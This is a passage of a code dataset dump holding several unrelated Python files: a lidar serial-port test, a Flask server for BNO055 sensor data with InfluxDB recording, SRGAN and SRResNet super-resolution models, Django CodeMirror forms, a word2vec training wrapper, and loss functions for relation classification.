1]))\n","sub_path":"leetcode/2021/longest-subarray-of-1s-after-deleting-one-element.py","file_name":"longest-subarray-of-1s-after-deleting-one-element.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"437059579","text":"#Author:Bing Liu\r\n\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport threading\r\nimport time\r\n\r\nclass MSerialPort:\r\n message = ''\r\n def __init__(self, port, buandRate=115000, timeOut=2):\r\n self.port = serial.Serial(port, buandRate, timeout=timeOut)\r\n if not self.port.isOpen():\r\n self.port.open()\r\n def portOpen(self):\r\n if not self.port.isOpen():\r\n self.port.open()\r\n def portClose(self):\r\n self.port.close()\r\n def sendData(self,data):\r\n number = self.port.write(data)\r\n return number\r\n def readData(self):\r\n while True:\r\n data = self.port.readline()\r\n self.message = data\r\n\r\nif __name__ == '__main__':\r\n mSerial = MSerialPort('COM3', 115000)\r\n threading.Thread(target=mSerial.readData).start()\r\n\r\n while True:\r\n time.sleep(3)\r\n # send the raw command bytes; '\\xA5\\x60'.encode() would UTF-8-encode\r\n # 0xA5 into two bytes and corrupt the command\r\n mSerial.sendData(b'\\xA5\\x60')\r\n print(mSerial.message)\r\n mSerial.message = None\r\n print('next line')\r\n","sub_path":"Py-lidar data analysis - V1.0/SerialPortTest.py","file_name":"SerialPortTest.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412319970","text":"import threading\nimport time\n\nfrom Adafruit_BNO055 import BNO055\nfrom flask import *\nfrom influxdb import InfluxDBClient\n\nfrom car_information import CarInformation\nfrom influx_database_util import InfluxDatabaseUtil\n\nCALIBRATION_FILE = 'calibration.json'\n\nBNO_AXIS_REMAP = {'x': BNO055.AXIS_REMAP_X,\n 'y': BNO055.AXIS_REMAP_Z,\n 'z': BNO055.AXIS_REMAP_Y,\n 'x_sign': BNO055.AXIS_REMAP_POSITIVE,\n 'y_sign': BNO055.AXIS_REMAP_POSITIVE,\n 'z_sign': BNO055.AXIS_REMAP_NEGATIVE}\n\nBNO_UPDATE_FREQ_HZ = 5\n\nbno = BNO055.BNO055(serial_port='/dev/ttyAMA0', rst=18)\n\nbno_changed = threading.Condition()\n\nbno_data = {}\n\nRECORDING = False\nREPLAY = False\n\napp = Flask(__name__)\n\n\ndef start_sensor_thread():\n # Start the BNO thread right before the first request is served. 
This is\n # necessary because in debug mode flask will start multiple main threads so\n # this is the only spot to put code that can only run once after starting.\n # See this SO question for more context:\n # http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug\n global bno_thread\n # Initialize BNO055 sensor.\n if not bno.begin():\n raise RuntimeError('Failed to initialize BNO055!')\n bno.set_axis_remap(**BNO_AXIS_REMAP)\n # Kick off BNO055 reading thread.\n bno_thread = threading.Thread(target=read_sensor)\n bno_thread.daemon = True # Don't let the BNO reading thread block exiting.\n bno_thread.start()\n\n\nbno_thread = None\n\n\ndef read_sensor():\n \"\"\"Function to read the BNO sensor and update the bno_data object with the\n latest BNO orientation, etc. state. Must be run in its own thread because\n it will never return!\n \"\"\"\n # bno = None\n while True:\n global RECORDING\n global REPLAY\n # Grab new BNO sensor readings.\n temp = bno.read_temp()\n heading, roll, pitch = bno.read_euler()\n x, y, z, w = bno.read_quaternion()\n sys, gyro, accel, mag = bno.get_calibration_status()\n status, self_test, error = bno.get_system_status(run_self_test=False)\n acceleration = bno.read_accelerometer()\n\n data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': str(temp),\n 'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w,\n }\n\n if error != 0:\n print('Error! Value: {0}'.format(error))\n # Capture the lock on the bno_changed condition so the bno_data shared\n # state can be updated.\n\n with bno_changed:\n bno_data['euler'] = (heading, roll, pitch)\n bno_data['temp'] = temp\n bno_data['quaternion'] = (x, y, z, w)\n bno_data['acceleration'] = acceleration\n bno_data['calibration'] = (sys, gyro, accel, mag)\n # Notify any waiting threads that the BNO state has been updated.\n if RECORDING:\n client = InfluxDatabaseUtil.get_client()\n client.write_points([{\"measurement\": \"sensor_data\",\n \"fields\": data}])\n bno_changed.notifyAll()\n # Sleep until the next reading.\n time.sleep(1.0 / BNO_UPDATE_FREQ_HZ)\n\n\ndef present_sensor_data():\n while True:\n # Capture the bno_changed condition lock and then wait for it to notify\n # a new reading is available.\n global REPLAY\n with bno_changed:\n bno_changed.wait()\n if not REPLAY:\n heading, roll, pitch = bno_data['euler']\n temp = bno_data['temp']\n x, y, z, w = bno_data['quaternion']\n sys, gyro, accel, mag = bno_data['calibration']\n acceleration = bno_data['acceleration']\n # Send the data to the connected client in HTML5 server sent event format.\n data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': temp,\n 'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w, 'acceleration': acceleration}\n\n yield 'data: {0}\\n\\n'.format(json.dumps(data))\n\n\n@app.route('/replay')\ndef start_replay():\n global RECORDING\n global REPLAY\n RECORDING = False\n REPLAY = True\n client = InfluxDatabaseUtil.get_client()\n results = client.query('select * from sensor_data;')\n json_results = []\n for result in results:\n for res in result:\n json_results.append(json.dumps(res))\n\n final_final_results = '\\'data\\': {0}\\n\\n'.format(json_results)\n\n return Response(final_final_results, mimetype='text/json')\n\n\n@app.route(\"/record\", methods=['POST'])\ndef record():\n client = InfluxDatabaseUtil.get_client()\n client.drop_database('ems')\n client.create_database('ems')\n global RECORDING\n global REPLAY\n RECORDING = True\n REPLAY = False\n return 'OK'\n\n\n@app.route(\"/stop_record\", 
methods=['POST'])\ndef stop_record():\n global RECORDING\n global REPLAY\n RECORDING = False\n REPLAY = False\n return 'OK'\n\n\n@app.before_first_request\ndef init():\n start_sensor_thread()\n\n\n@app.route('/bno')\ndef bno_path():\n # Return SSE response and call bno_sse function to stream sensor data to\n # the webpage.\n return Response(present_sensor_data(), mimetype='text/event-stream')\n\n\n# Will simulate a request to an open API at Transportstyrelsen.\n@app.route('/carInformation', methods=['GET'])\ndef carInformation():\n return CarInformation.getCarInformation()\n\n\n@app.route(\"/\")\ndef root():\n return render_template(\"index.html\")\n\n\nif __name__ == '__main__':\n # Create a server listening for external connections on the default\n # port 5000. Enable debug mode for better error messages and live\n # reloading of the server on changes. Also make the server threaded\n # so multiple connections can be processed at once (very important\n # for using server sent events).\n app.run(host='0.0.0.0', debug=True, threaded=True)\n","sub_path":"ems_server.py","file_name":"ems_server.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129861527","text":"import helpers\nimport torch\nimport torch.nn as nn\nimport torchvision.models as mod\nfrom torchvision import transforms\nfrom numpy import log2\nfrom PIL import Image\n\n\nclass SRGAN():\n def __init__(self, args):\n self.args = args\n\n self.generator = SRGAN_Generator(args)\n if args.gen == \"\":\n self.generator.apply(helpers.weights_init)\n else:\n self.generator.load_state_dict(torch.load(args.gen))\n\n if args.mode == \"train\":\n self.discriminator = SRGAN_Discriminator(args)\n if args.disc == \"\":\n self.discriminator.apply(helpers.weights_init)\n else:\n self.discriminator.load_state_dict(torch.load(args.disc))\n\n self.adversarial_loss = nn.BCELoss()\n\n if args.content_loss == \"mse\":\n self.content_loss = nn.MSELoss()\n elif args.content_loss == \"l1\":\n self.content_loss = nn.L1Loss()\n elif args.content_loss == \"vgg\":\n self.content_loss = Vgg54Loss()\n else:\n raise NotImplementedError(\"Chosen content loss function not yet implemented\")\n\n self.gen_opt = torch.optim.Adam(self.generator.parameters(), lr=args.lr)\n self.disc_opt = torch.optim.Adam(self.discriminator.parameters(), lr=args.lr)\n self.labels = torch.autograd.Variable(torch.FloatTensor(args.batch_size), requires_grad=False)\n else:\n self.generator.eval()\n\n def anneal_lr(self, val=10):\n self.args.lr /= val\n self.gen_opt = torch.optim.Adam(self.generator.parameters(), lr=self.args.lr)\n self.disc_opt = torch.optim.Adam(self.discriminator.parameters(), lr=self.args.lr)\n\n def train_on_batch(self, epoch, num_epochs, batch_num, num_batches, hr_imgs, lr_imgs):\n if self.args.mode == \"train\":\n if self.args.use_cuda:\n hr_imgs = hr_imgs.cuda(device_id=self.args.device_id)\n lr_imgs = lr_imgs.cuda(device_id=self.args.device_id)\n\n #train discriminator\n self.discriminator.zero_grad()\n self.labels.data.resize_(hr_imgs.size(0), 1).fill_(1)\n output = self.discriminator(hr_imgs)\n loss_d1 = self.adversarial_loss(output, self.labels)\n loss_d1.backward()\n\n self.labels.data.resize_(lr_imgs.size(0), 1).fill_(0)\n sr_imgs = self.generator(lr_imgs)\n output = self.discriminator(sr_imgs.detach())\n loss_d2 = self.adversarial_loss(output, self.labels)\n loss_d2.backward()\n self.disc_opt.step()\n\n #train generator\n self.generator.zero_grad()\n 
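# note: the generator step labels its own fakes as \"real\" (1) -- the non-saturating GAN objective -- and its total loss below combines the content loss with adv_weight times this adversarial term\n 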
self.labels.data.fill_(1)\n output = self.discriminator(sr_imgs)\n loss_g = self.content_loss(sr_imgs, hr_imgs) + \\\n self.args.adv_weight * self.adversarial_loss(output, self.labels)\n loss_g.backward()\n self.gen_opt.step()\n\n print(\"[%d/%d][%d/%d] Loss_Gen: %.4f Real_Loss_Disc: %.4f, Fake_Loss_Disc: %.4f\"\n % (epoch, num_epochs, batch_num + 1, num_batches, loss_g.data[0], loss_d1.data[0], loss_d2.data[0]))\n else:\n raise ValueError(\"SRGAN not declared in train mode\")\n\n def super_resolve(self, lr_img):\n if self.args.mode == \"test\":\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n return self.generator(lr_img).cpu() if lr_img.is_cuda else self.generator(lr_img)\n else:\n raise ValueError(\"SRGAN not declared in test mode\")\n\n def save_test_image(self):\n to_pil = transforms.ToPILImage()\n to_tensor = transforms.ToTensor()\n\n lr_img = to_tensor(Image.open(\"./Set5/image_SRF_4/img_003_SRF_4_LR.png\")).unsqueeze(0)\n lr_img = torch.autograd.Variable(lr_img, volatile=True)\n\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n sr_img = self.generator(lr_img)\n\n if self.args.use_cuda:\n sr_img = sr_img.cpu()\n\n sr_img = to_pil(sr_img.data[0].clamp(min=0, max=1))\n sr_img.save(\"%s/sr_img.png\" % self.args.out_folder)\n\n def save_models(self):\n self.generator.cpu()\n self.discriminator.cpu()\n torch.save(self.generator.state_dict(), \"%s/generator_weights.pth\" % self.args.out_folder)\n torch.save(self.discriminator.state_dict(), \"%s/discriminator_weights.pth\" % self.args.out_folder)\n self.generator.cuda(device_id=self.args.device_id)\n self.discriminator.cuda(device_id=self.args.device_id)\n\n def to_cuda(self):\n self.generator.cuda(device_id=self.args.device_id)\n\n if self.args.mode == \"train\":\n self.discriminator.cuda(device_id=self.args.device_id)\n self.labels = self.labels.cuda(device_id=self.args.device_id)\n self.adversarial_loss.cuda(device_id=self.args.device_id)\n self.content_loss.cuda(device_id=self.args.device_id)\n\n\nclass SRResNet():\n def __init__(self, args):\n self.args = args\n\n self.model = SRGAN_Generator(args)\n if args.model == \"\":\n self.model.apply(helpers.weights_init)\n else:\n self.model.load_state_dict(torch.load(args.model))\n\n if args.mode == \"train\":\n if args.content_loss == \"mse\":\n self.content_loss = nn.MSELoss()\n elif args.content_loss == \"l1\":\n self.content_loss = nn.L1Loss()\n elif args.content_loss == \"vgg\":\n self.content_loss = Vgg22WithTotalVariation(args.tv_weight)\n else:\n raise NotImplementedError(\"Chosen content loss function not yet implemented\")\n\n self.opt = torch.optim.Adam(self.model.parameters(), lr=args.lr)\n else:\n self.model.eval()\n\n def train_on_batch(self, epoch, num_epochs, batch_num, num_batches, hr_imgs, lr_imgs):\n if self.args.mode == \"train\":\n if self.args.use_cuda:\n hr_imgs = hr_imgs.cuda(device_id=self.args.device_id)\n lr_imgs = lr_imgs.cuda(device_id=self.args.device_id)\n\n self.model.zero_grad()\n sr_imgs = self.model(lr_imgs)\n loss = self.content_loss(sr_imgs, hr_imgs)\n loss.backward()\n self.opt.step()\n\n print(\"[%d/%d][%d/%d] Loss: %.4f\"\n % (epoch, num_epochs, batch_num + 1, num_batches, loss.data[0]))\n else:\n raise ValueError(\"SRResNet not declared in train mode\")\n\n def super_resolve(self, lr_img):\n if self.args.mode == \"test\":\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n return self.model(lr_img).cpu() if lr_img.is_cuda else self.model(lr_img)\n else:\n 
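# the model was constructed in train mode, so single-image inference is not supported\n 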
raise ValueError(\"SRResNet not declared in test mode\")\n\n def anneal_lr(self, val=10):\n self.args.lr /= val\n self.opt = torch.optim.Adam(self.model.parameters(), lr=self.args.lr)\n\n def save_test_image(self):\n to_pil = transforms.ToPILImage()\n to_tensor = transforms.ToTensor()\n\n lr_img = to_tensor(Image.open(\"./Set5/image_SRF_4/img_003_SRF_4_LR.png\")).unsqueeze(0)\n lr_img = torch.autograd.Variable(lr_img, volatile=True)\n\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n sr_img = self.model(lr_img)\n\n if self.args.use_cuda:\n sr_img = sr_img.cpu()\n\n sr_img = to_pil(sr_img.data[0].clamp(min=0, max=1))\n sr_img.save(\"%s/sr_img.png\" % self.args.out_folder)\n\n def save_model(self):\n self.model.cpu()\n torch.save(self.model.state_dict(), \"%s/srresnet_weights.pth\" % self.args. out_folder)\n self.model.cuda(device_id=self.args.device_id)\n\n def to_cuda(self):\n self.model.cuda(device_id=self.args.device_id)\n\n if self.args.mode == \"train\":\n self.content_loss.cuda(device_id=self.args.device_id)\n\n\nclass SRGAN_Generator(nn.Module):\n def __init__(self, args):\n super(SRGAN_Generator, self).__init__()\n\n sequence = [nn.Conv2d(3, 64, kernel_size=9, padding=4), nn.PReLU()]\n sequence += [GeneratorResidualSubnet()]\n\n num_shuffle_blocks = log2(args.upscale_factor)\n assert num_shuffle_blocks.is_integer(), \"Upscale factor should be a power of 2\"\n\n for i in range(int(num_shuffle_blocks)):\n sequence += [GeneratorPixelShuffleBlock()]\n\n sequence += [nn.Conv2d(64, 3, kernel_size=9, padding=4)]\n\n self.generator = nn.Sequential(*sequence)\n\n def forward(self, x):\n return self.generator(x)\n\nclass GeneratorPixelShuffleBlock(nn.Module):\n def __init__(self, num_filters=64):\n super(GeneratorPixelShuffleBlock, self).__init__()\n\n self.shuffle_block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters * 4, kernel_size=3, padding=1),\n nn.PixelShuffle(2),\n nn.PReLU()\n )\n\n def forward(self, x):\n return self.shuffle_block(x)\n\nclass GeneratorResidualSubnet(nn.Module):\n def __init__(self, num_blocks=16, num_filters=64):\n super(GeneratorResidualSubnet, self).__init__()\n\n sequence = []\n\n for i in range(num_blocks):\n sequence += [GeneratorBlock(num_filters)]\n\n sequence += [nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1), nn.BatchNorm2d(num_filters)]\n\n self.subnet = nn.Sequential(*sequence)\n\n def forward(self, x):\n return x + self.subnet(x)\n\nclass GeneratorBlock(nn.Module):\n def __init__(self, num_filters):\n super(GeneratorBlock, self).__init__()\n\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters),\n nn.PReLU(),\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters)\n )\n\n def forward(self, x):\n return x + self.block(x)\n\n\nclass SRGAN_Discriminator(nn.Module):\n def __init__(self, args, num_filters=64):\n super(SRGAN_Discriminator, self).__init__()\n\n conv_sequence = [nn.Conv2d(3, 64, kernel_size=3, padding=1), nn.LeakyReLU(.2, inplace=True),\n DiscriminatorBlock(num_filters=num_filters, strided=True)]\n\n for i in range(3):\n num_filters *= 2\n conv_sequence += [DiscriminatorBlock(num_filters=num_filters, strided=False),\n DiscriminatorBlock(num_filters=num_filters, strided=True)]\n\n in_dim = ((args.crop_size / 16) ** 2) * num_filters * 2\n linear_sequence = [nn.Linear(in_dim, 1024), nn.LeakyReLU(.2, inplace=True),\n nn.Linear(1024, 1), nn.Sigmoid()]\n\n self.conv_subnet = 
nn.Sequential(*conv_sequence)\n self.linear_subnet = nn.Sequential(*linear_sequence)\n\n def forward(self, x):\n y = self.conv_subnet(x)\n y = y.view(y.size(0), -1)\n return self.linear_subnet(y)\n\nclass DiscriminatorBlock(nn.Module):\n def __init__(self, num_filters, strided):\n super(DiscriminatorBlock, self).__init__()\n\n if strided:\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters * 2, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(num_filters * 2),\n nn.LeakyReLU(.2, inplace=True)\n )\n else:\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters),\n nn.LeakyReLU(.2, inplace=True)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass Vgg54Loss(nn.Module):\n def __init__(self, rescaling_factor=12.75):\n super(Vgg54Loss, self).__init__()\n self.vgg = Vgg54()\n self.rescaling_factor = rescaling_factor\n\n def modified_euclidean_distance(self, x):\n (num_images, _, h, w) = x.size()\n return torch.sum(torch.pow(x, 2)).mul(1.0 / (num_images * w * h * self.rescaling_factor))\n\n def __call__(self, sr_imgs, hr_imgs):\n sr_feature_maps = self.vgg(sr_imgs)\n hr_feature_maps = self.vgg(hr_imgs).detach()\n return self.modified_euclidean_distance(sr_feature_maps - hr_feature_maps)\n\nclass Vgg54(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg54, self).__init__()\n pretrained_model = mod.vgg19(pretrained=True)\n self.modified_pretrained = nn.Sequential(*list(pretrained_model.features.children())[:-1])\n\n for (_, layer) in self.modified_pretrained._modules.items():\n layer.requires_grad = requires_grad\n\n def forward(self, x):\n return self.modified_pretrained(x)\n\n\nclass Vgg22WithTotalVariation(nn.Module):\n def __init__(self, tv_weight):\n super(Vgg22WithTotalVariation, self).__init__()\n self.vgg_loss = Vgg22Loss()\n self.tv_loss = TotalVariationLoss(tv_weight)\n\n def __call__(self, sr_imgs, hr_imgs):\n return self.vgg_loss(sr_imgs, hr_imgs) + self.tv_loss(sr_imgs)\n\nclass Vgg22Loss(nn.Module):\n def __init__(self, rescaling_factor=12.75):\n super(Vgg22Loss, self).__init__()\n self.vgg = Vgg22()\n self.rescaling_factor = rescaling_factor\n\n def modified_euclidean_distance(self, x):\n (num_images, _, h, w) = x.size()\n return torch.sum(torch.pow(x, 2)).mul(1.0 / (num_images * w * h * self.rescaling_factor))\n\n def __call__(self, sr_imgs, hr_imgs):\n sr_feature_maps = self.vgg(sr_imgs)\n hr_feature_maps = self.vgg(hr_imgs).detach()\n return self.modified_euclidean_distance(sr_feature_maps - hr_feature_maps)\n\nclass Vgg22(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg22, self).__init__()\n pretrained_model = mod.vgg19(pretrained=True)\n self.modified_pretrained = nn.Sequential(*list(pretrained_model.features.children())[:9])\n\n for (_, layer) in self.modified_pretrained._modules.items():\n layer.requires_grad = requires_grad\n\n def forward(self, x):\n return self.modified_pretrained(x)\n\nclass TotalVariationLoss(nn.Module):\n def __init__(self, tv_weight):\n super(TotalVariationLoss, self).__init__()\n self.tv_weight = tv_weight\n\n def __call__(self, imgs):\n pixel_diff1 = imgs[:, :, 1:, :] - imgs[:, :, :-1, :]\n pixel_diff2 = imgs[:, :, :, 1:] - imgs[:, :, :, :-1]\n # parenthesize so tv_weight scales both directional variation terms\n return self.tv_weight * (torch.sum(torch.abs(pixel_diff1)) + torch.sum(torch.abs(pixel_diff2)))\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"335378811","text":"# -*- coding: utf-8 -*-\n\"\"\"\nForms\n\"\"\"\nfrom django import forms\n\nfrom django.utils.translation import ugettext\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse\n\nfrom djangocodemirror import settings_local\nfrom djangocodemirror.widgets import CodeMirrorWidget\nfrom djangocodemirror.fields import DjangoCodeMirrorField\n\nTHEME_CHOICES = [(v.split('/')[-1].split('.')[0], k) for k,v in settings_local.CODEMIRROR_THEMES]\n\n# Try import for parser\ntry:\n from rstview.parser import SourceReporter, map_parsing_errors\nexcept ImportError:\n # Dummy fallback\n def map_parsing_errors(error, *args, **kwargs):\n # Translators: Dummy error to return when no supported parser is installed\n return ugettext(\"Dummy\")\n def SourceReporter(source, *args, **kwargs):\n return []\n\n# Try import for django-crispy-forms\ntry:\n from crispy_forms.helper import FormHelper\n from crispy_forms.layout import Submit\nexcept ImportError:\n # Dummy fallback\n def get_form_helper():\n return None\nelse:\n def get_form_helper():\n helper = FormHelper()\n helper.form_action = '.'\n helper.form_style = 'inline'\n helper.add_input(Submit('submit', _('Save')))\n return helper\n\nclass DjangoCodeMirrorSampleForm(forms.Form):\n \"\"\"\n Sample form\n \"\"\"\n content = DjangoCodeMirrorField(label=u\"DjangoCodeMirror\", max_length=50000, required=True, config_name='djangocodemirror_sample_demo')\n \n def clean_content(self):\n \"\"\"\n Parse content to check eventual markup syntax errors and warnings\n \"\"\"\n content = self.cleaned_data.get(\"content\")\n if content:\n errors = SourceReporter(content)\n if errors:\n raise forms.ValidationError(map(map_parsing_errors, errors))\n return content\n \n def save(self, *args, **kwargs):\n return\n\nclass DjangoCodeMirrorSettingsForm(forms.Form):\n \"\"\"\n Editor settings form\n \"\"\"\n editor_settings_url = 'djangocodemirror-settings'\n \n theme = forms.ChoiceField(label=_('theme'), initial=settings_local.DJANGOCODEMIRROR_DEFAULT_THEME, choices=THEME_CHOICES, required=False, help_text=_(\"The theme to style the editor with.\"))\n lineWrapping = forms.BooleanField(label=_('line wrapping'), initial=True, required=False, help_text=_(\"Whether CodeMirror should scroll or wrap for long lines.\"))\n no_tab_char = forms.BooleanField(label=_('avoid tabulation'), initial=True, required=False, help_text=_(\"Disable usage of any tabulation character, instead each tabulation will be replaced by 4 space characters.\"))\n \n def __init__(self, *args, **kwargs):\n self.helper = get_form_helper()\n if self.helper is not None:\n self.helper.form_action = reverse(self.editor_settings_url)\n \n super(DjangoCodeMirrorSettingsForm, self).__init__(*args, **kwargs)\n \n def save(self, *args, **kwargs):\n no_tab_char = self.cleaned_data.get('no_tab_char')\n # Set the needed options to avoid tabulation character usage\n if no_tab_char:\n self.cleaned_data.update({\n \"indentUnit\": 4,\n \"tabSize\": 4,\n \"indentWithTabs\": False,\n })\n else:\n self.cleaned_data.update({\n \"indentWithTabs\": True,\n })\n return self.cleaned_data\n","sub_path":"djangocodemirror/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38494268","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"train the word2vec model\n\ninput_file: 以 space/tab/eod 作为分词边界\n\"\"\"\n\nimport 
argparse\n\nimport pandas as pd\nimport numpy as np\nimport torchtext\nimport subprocess\nimport shlex\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Train word2vec model.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n required_group = parser.add_argument_group(\"required named arguments\")\n required_group.add_argument(\"--text-data-file\", \"-tdf\",\n help=\"use text data from <file> to train the model, assuming tab/space/EOL spaced tokens\", required=True)\n parser.add_argument(\"--alpha\", default=0.025,\n help=\"Set the starting learning rate: 0.025 suggested for skip-gram; 0.05 suggested for CBOW\")\n parser.add_argument(\"--dim-embedding\", \"-dm\", help=\"set size of word vectors (dim of embedding)\", default=128)\n parser.add_argument(\"--iter\", \"-it\", default=5, help=\"Run more training iterations\", type=int)\n parser.add_argument(\"--cbow\", help=\"Use the continuous bag of words model: 0 ~ skip gram; 1 ~ CBOW\", default=1)\n parser.add_argument(\"--window-size\", \"-ws\", help=\"set max skip length between words\", default=5)\n parser.add_argument(\"--frequency-threshold\", \"-ft\",\n help=\"Set threshold for occurrence of words. Those that appear with higher frequency in the training data will be randomly down-sampled, useful range is (0, 1e-5)\", default=1e-3)\n parser.add_argument(\"--use-hierarchical-softmax\", \"-uhs\",\n help=\"Use Hierarchical Softmax: 0 ~ not used; 1 ~ used\", default=0)\n parser.add_argument(\"--number-negative\", \"-nn\",\n help=\"Number of negative examples, common values are 3 - 10 (0=not used)\", default=5)\n parser.add_argument(\"--threads\", default=12, help=\"Use <int> threads\")\n parser.add_argument(\"--min-count\", default=3,\n help=\"This will discard words that appear less than <int> times\")\n parser.add_argument(\"--output-clusters\", \"-oc\",\n help=\"number of output clusters: 0 ~ output word vectors, NO kmeans; >0 ~ number of clusters in k-means\", default=0, type=int)\n parser.add_argument(\"--debug\", help=\"Set the debug mode: 2=more info during training\", default=2)\n parser.add_argument(\"--binary\", \"-b\",\n help=\"Save the resulting vectors in binary mode: 0 text; 1 binary; 2 both\", default=2, type=int)\n\n # parser.add_argument(\"--output-file\", \"-of\",\n # help=\"Use <file> to save the resulting word vectors / word clusters\", default=\"/tmp/output\")\n # parser.add_argument(\"--save-vocab\", \"-sv\",\n # help=\"the vocabulary will be saved to <file>. 
If not set, it is saved to `text_data_file.vocab`\", default=None)\n # parser.add_argument(\"--read-vocab\", \"-rv\",\n # help=\"The vocabulary will be read from <file>, not constructed from the training data\")\n\n args = parser.parse_args()\n\n args.save_vocab = args.text_data_file.replace(\".txt\", \".vocab\")\n if args.output_clusters > 0:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.cluster.txt\".format(args.iter))\n else:\n if args.binary == 0:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.txt\".format(args.iter))\n elif args.binary == 1:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.bin\".format(args.iter))\n else:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.txt\".format(args.iter))\n\n # the word2vec CLI expects single-dash flags, so -alpha rather than --alpha\n cmd = \"../bin/word2vec -train {} -output {} -size {} -window {} -sample {} -hs {} -negative {} -threads {} -iter {} -min-count {} -classes {} -binary {} -save-vocab {} -cbow {} -alpha {}\".format(\n args.text_data_file, args.output_file, args.dim_embedding, args.window_size, args.frequency_threshold, args.use_hierarchical_softmax,\n args.number_negative, args.threads, args.iter, args.min_count, args.output_clusters, args.binary, args.save_vocab, args.cbow, args.alpha\n )\n print(cmd)\n subprocess.run(shlex.split(cmd))\n print(\"See {} for result\".format(args.output_file))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242645039","text":"import torch\nimport torch.nn.functional as F\n\n\ndef two_step_loss(score, label):\n \"\"\" Separate the \"other\" label. Use a binary classifier to detect \"other\" label and another\n 18-way classifier to detect true labels.\n\n Args:\n true_label_score: tensor of shape (batch_size, 18)\n other_label_score: tensor of shape (batch_size, 2)\n label: (batch_size)\n\n Returns: loss\n\n \"\"\"\n true_label_score, other_label_score = score\n not_other = label != 18\n\n if torch.cuda.is_available():\n binary_loss = F.cross_entropy(other_label_score, not_other.type(torch.cuda.LongTensor))\n else:\n binary_loss = F.cross_entropy(other_label_score, not_other.type(torch.LongTensor))\n\n # for the class loss, we only consider examples that are not \"Other\"\n true_label_score_not_other = true_label_score[not_other]\n not_other_label = label[not_other]\n class_loss = F.cross_entropy(true_label_score_not_other, not_other_label)\n return binary_loss + class_loss\n\n\ndef rank_loss(score, label, margin=1., gamma=1.):\n \"\"\" Santos(2015). Classifying Relations by Ranking with Convolutional Neural Networks. 
ACL.\n\n\n Args:\n score: (batch_size, 18)\n label: (batch_size)\n\n Returns: rank loss\n\n \"\"\"\n # print(score.shape, label.shape)\n\n mask = label != 18 # create a mask and set the positive score for \"Other\" label to be zero.\n\n label_without_other = label.clone()\n label_without_other[mask == 0] = 0 # set other label to anything else\n\n score_label = torch.gather(score, dim=1, index=label_without_other.unsqueeze(-1)).squeeze(1)\n\n # print(score_label.shape)\n # print(mask.shape)\n\n # select negative label with maximum score\n _, top_2_index = torch.topk(score, k=2, dim=-1)\n # select the top 2 index that doesn't equal to label\n largest_index = top_2_index[:, 0]\n second_largest_index = top_2_index[:, 1]\n final_index = largest_index.clone()\n final_index[largest_index == label] = second_largest_index[largest_index == label]\n\n # print(final_index.shape)\n # print(final_index.type())\n\n negative_label_score = score.gather(dim=1, index=final_index.unsqueeze(-1)).squeeze(1)\n\n if torch.cuda.is_available():\n positive_score = torch.log1p(torch.exp(gamma * (margin - score_label))) * mask.type(torch.cuda.FloatTensor)\n else:\n positive_score = torch.log1p(torch.exp(gamma * (margin - score_label))) * mask.type(torch.FloatTensor)\n negative_score = torch.log1p(torch.exp(gamma * (-margin + negative_label_score)))\n\n # print(positive_score.shape, negative_score.shape)\n\n return (positive_score + negative_score).mean()\n\n\ndef rank_loss_classifier(score):\n \"\"\" Santos(2015). Classifying Relations by Ranking with Convolutional Neural Networks. ACL.\n if all the score are less than zero. Then, set it to 18. Otherwise, pick the largest one.\n\n Args:\n score: (batch_size, 18)\n\n Returns: classified label (batch_size)\n\n \"\"\"\n label = torch.max(score, 1)[1].data\n mask = (score < 0).all(dim=1)\n label[mask == 1] = 18\n return label\n\n\ndef get_loss(type='cross_entropy'):\n if type == 'cross_entropy':\n return F.cross_entropy\n\n elif type == 'two_step':\n return two_step_loss\n elif type == 'rank':\n 